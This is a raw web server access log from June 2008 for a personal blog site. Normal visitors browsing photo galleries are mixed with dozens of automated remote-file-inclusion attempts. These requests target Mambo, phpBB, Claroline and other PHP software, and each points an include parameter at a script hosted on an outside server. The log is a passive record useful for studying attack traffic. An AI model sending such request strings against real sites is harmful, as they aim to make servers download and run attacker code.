89.108.67.119 - - [09/Jun/2008:10:54:41 -0700] "GET //MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:54:42 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:54:43 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:54:43 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:54:46 -0700] "GET /logs/access_080217.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:54:47 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:54:47 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:54:48 -0700] "GET /logs/access_080325.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:54:54 -0700] "GET /logs/access_071230.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:54:55 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:54:55 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.132.170 - - [09/Jun/2008:10:55:01 -0700] "GET /logs/access_080429.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:10:55:07 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [09/Jun/2008:10:55:18 -0700] "GET /logs/access_080208.log/index.php?body=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:55:20 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:55:20 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.47.247.136 - - [09/Jun/2008:10:55:20 -0700] "GET /index.php?body=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 200 16843 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [09/Jun/2008:10:55:22 -0700] "GET /logs/index.php?body=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:55:22 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:55:23 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:55:23 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:55:29 -0700] "GET /logs/access_080215.log//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:55:30 -0700] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:10:55:30 -0700] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:10:55:42 -0700] "GET /logs/access_080302.log//update/update5.php?lang=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.47.247.136 - - [09/Jun/2008:10:55:52 -0700] "GET /logs/access_080223.log/index.php?body=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:55:52 -0700] "GET /logs/access_071230.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:55:53 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:55:53 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:10:56:03 -0700] "GET /logs/access_080308.log//update/update5.php?lang=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:56:08 -0700] "GET /logs/access_071230.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:56:08 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:56:09 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.135 - - [09/Jun/2008:10:56:25 -0700] "GET /logs/access_071215.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:26 -0700] "GET /logs/access_071230.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:26 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:26 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:34 -0700] "GET /logs/access_080217.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:34 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:34 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:35 -0700] "GET /logs/access_071230.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:35 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:56:36 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:56:48 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:56:57 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:56:58 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:56:58 -0700] "GET /logs/index.php?phttp://www.amordebicho.com/st0rm.gif?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:56:58 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:56:59 -0700] "GET /logs/index.php?phttp://www.amordebicho.com/st0rm.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:57:00 -0700] "GET /index.php?phttp://www.amordebicho.com/st0rm.gif?? HTTP/1.1" 200 16791 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:57:02 -0700] "GET /index.php?phttp://www.amordebicho.com/st0rm.gif??? HTTP/1.1" 200 16793 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
193.111.11.7 - - [09/Jun/2008:10:57:21 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:57:31 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:57:42 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:57:43 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:57:52 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:58:00 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:58:01 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:58:01 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:10:58:29 -0700] "GET /logs/?error/index.php?error=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 51131 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:10:58:32 -0700] "GET /?error/index.php?error=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 16855 "-" "libwww-perl/5.803" "www.dmulk.com"
209.139.209.245 - - [09/Jun/2008:10:58:45 -0700] "GET /xmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:58:53 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:58:53 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:58:54 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:10:59:01 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:05 -0700] "GET / HTTP/1.1" 200 16669 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:06 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:06 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:06 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:06 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:07 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:07 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:07 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:25 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:26 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:33 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:35 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 1376256 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:35 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:00:36 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 262144 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:00:51 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [09/Jun/2008:11:00:51 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.156.192.5 - - [09/Jun/2008:11:01:10 -0700] "GET /logs/access_080429.log/claroline/inc/claro_init_header.inc.php?includePath=http://tugaspeed.info/system.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:01:25 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:01:50 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:01:52 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:01:53 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:01:53 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:01:55 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&377 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:01:57 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&603 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:01:59 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:01:59 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:02:00 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:00 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0154.jpg HTTP/1.1" 200 344712 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:02:02 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0112.jpg HTTP/1.1" 200 428986 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:12 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:23 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
72.207.116.43 - - [09/Jun/2008:11:02:24 -0700] "GET /blog/index.php/category/motorcycles HTTP/1.1" 200 15755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:02:26 -0700] "GET /logs/access.log/plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:02:26 -0700] "GET /plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:26 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0173.jpg HTTP/1.1" 200 357822 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
74.52.238.34 - - [09/Jun/2008:11:02:27 -0700] "GET /logs/plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.79 - - [09/Jun/2008:11:02:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0024.jpg HTTP/1.1" 200 313646 "-" "Googlebot-Image/1.0" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:29 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:31 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0130.jpg HTTP/1.1" 200 510650 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:02:31 -0700] "GET /logs/access_080331.log/page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:02:31 -0700] "GET /page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:02:32 -0700] "GET /logs/page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.207.116.43 - - [09/Jun/2008:11:02:33 -0700] "GET /blog/index.php/category/motorcycles HTTP/1.1" 200 15755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "dmulk.com"
72.207.116.43 - - [09/Jun/2008:11:02:33 -0700] "GET /blog/index.php/category/motorcycles HTTP/1.1" 200 15754 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:02:35 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:02:40 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:51 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:55 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:56 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0168.jpg HTTP/1.1" 200 386333 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:58 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0003.jpg HTTP/1.1" 200 413558 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:58 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:02:59 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:01 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.dmulk.com"
